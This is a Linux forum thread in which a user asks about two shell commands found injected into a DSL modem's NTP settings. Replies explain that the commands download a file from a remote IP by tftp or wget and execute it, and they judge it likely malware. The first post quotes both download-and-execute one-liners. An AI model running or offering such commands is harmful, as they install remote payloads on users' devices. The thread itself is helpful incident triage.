LinuxQuestions.org
Download your favorite Linux distribution at LQ ISO.
Home Forums Tutorials Articles Register
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie
User Name
Password
Linux - Newbie This Linux forum is for members that are new to Linux.
Just starting out and have a question? If it is not in the man pages or the how-to's this is the place!

Notices


Reply
  Search this Thread
Old 04-28-2021, 06:36 AM   #1
barzin
LQ Newbie
 
Registered: Apr 2021
Posts: 1

Rep: Reputation: Disabled
what is this?


hello
i don't know where i have to ask this question
please guide me..
what is this script and what does it suppose to do in the dsl modem's ntp server custom options?

`cd /tmp;tftp -l4 -r4 -g ((an ip address and port number)) ;chmod 777 4;./4`

and sometimes became this one:

`cd /tmp;wget http://ip address :36296/4;chmod 777 4;./4`

thank you guys...
 
Old 04-28-2021, 08:55 AM   #2
TenTenths
Senior Member
 
Registered: Aug 2011
Location: Dublin
Distribution: Centos 5 / 6 / 7
Posts: 3,475

Rep: Reputation: 1553Reputation: 1553Reputation: 1553Reputation: 1553Reputation: 1553Reputation: 1553Reputation: 1553Reputation: 1553Reputation: 1553Reputation: 1553Reputation: 1553
It downloads a file from the IP address either by ftfp (Trivial File Transfer Protocol) or wget and executes it.
 
1 members found this post helpful.
Old 04-28-2021, 09:46 AM   #3
//////
Member
 
Registered: Nov 2005
Location: Land of Linux :: Finland
Distribution: Arch Linux && OpenBSD 7.4 && Pop!_OS && Kali && Qubes-Os
Posts: 824

Rep: Reputation: 350Reputation: 350Reputation: 350Reputation: 350
that looks to me malicious.

send that file to virustotals url scanner.
https://www.virustotal.com/gui/home/url
 
3 members found this post helpful.
Old 04-28-2021, 11:16 AM   #4
teckk
LQ Guru
 
Registered: Oct 2004
Distribution: Arch
Posts: 5,137
Blog Entries: 6

Rep: Reputation: 1826Reputation: 1826Reputation: 1826Reputation: 1826Reputation: 1826Reputation: 1826Reputation: 1826Reputation: 1826Reputation: 1826Reputation: 1826Reputation: 1826
If you are on a linux machine then read the man page.

Otherwise:
http://manpages.ubuntu.com/manpages/...n1/tftp.1.html
https://www.man7.org/linux/man-pages/man1/chmod.1.html
https://www.man7.org/linux/man-pages/man1/wget.1.html
https://www.man7.org/linux/man-pages/man1/cd.1p.html
 
Old 04-29-2021, 12:45 AM   #5
ondoho
LQ Addict
 
Registered: Dec 2013
Posts: 19,872
Blog Entries: 12

Rep: Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053Reputation: 6053
Quote:
Originally Posted by ////// View Post
that looks to me malicious.

send that file to virustotals url scanner.
https://www.virustotal.com/gui/home/url
To clarify: according to post #1, the downloaded file is called "4".
 
Old 04-29-2021, 03:42 AM   #6
elcore
Senior Member
 
Registered: Sep 2014
Distribution: Slackware
Posts: 1,753

Rep: Reputation: Disabled
Remember one just like it, from long time ago, it'd open many calculators until it ran out of memory.
No way to be sure what it does until you look into that /tmp/4 (could be anything, but probably a cryptominer or ransomware).
 
2 members found this post helpful.
  


Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie

All times are GMT -5. The time now is 12:15 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration